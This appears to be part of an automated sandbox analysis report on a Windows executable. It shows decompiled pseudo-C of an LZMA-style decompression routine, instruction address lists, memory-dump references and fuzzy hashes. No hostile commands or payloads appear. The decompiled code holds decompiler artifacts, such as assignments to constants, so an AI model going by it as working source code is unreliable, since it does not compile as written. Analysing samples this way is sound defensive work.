											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406566
0x00406566
0x00406566
0x00406566
0x0040656c
0x00406570
0x00406574
0x0040657e
0x0040658c
0x00406862
0x00406862
0x00406865
0x0040686c
0x00406899
0x00406899
0x0040689d
0x00000000
0x00000000
0x0040689f
0x004068a8
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068c0
0x004068d9
0x004068dc
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068d1
0x004068d4
0x004068d4
0x004068f6
0x00406896
0x00406896
0x00406896
0x00406899
0x0040689d
0x00000000
0x00000000
0x00000000
0x004068f8
0x004068f8
0x00406871
0x00406875
0x004069ad
0x004069ad
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x0040687b
0x00406881
0x00406888
0x00406890
0x00406890
0x00406893
0x00000000
0x00406893
0x004068fd
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00405fc4
0x00000000
0x00405fcb
0x00405fcf
0x00000000
0x00000000
0x00405fd5
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406030
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00406920
0x00000000
0x00406920
0x0040607a
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a4
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x0040692f
0x00000000
0x0040692f
0x004060ea
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x004067f8
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x00000000
0x00406131
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d0
0x004063d4
0x004063f2
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064ee
0x004064f2
0x004064f9
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00406977
0x00000000
0x00406977
0x004065df
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00406947
0x00000000
0x00406947
0x0040628d
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00406953
0x00000000
0x00406953
0x00406351
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00406983
0x00000000
0x00406983
0x00406662
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x00406767
0x0040676b
0x0040678d
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040676d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00406862
0x00406865
0x0040686c
0x00000000
0x0040686f
0x0040682a
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406915
0x00406918
0x00406819
0x00406819
0x00406819
0x00000000
0x0040681f
0x00000000
0x0040654f
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x0040686f
0x00000000
0x00000000
0x00000000
0x00406594
0x00406594
0x00406597
0x004065cd
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x0040662d
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x00406899
0x00406862

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
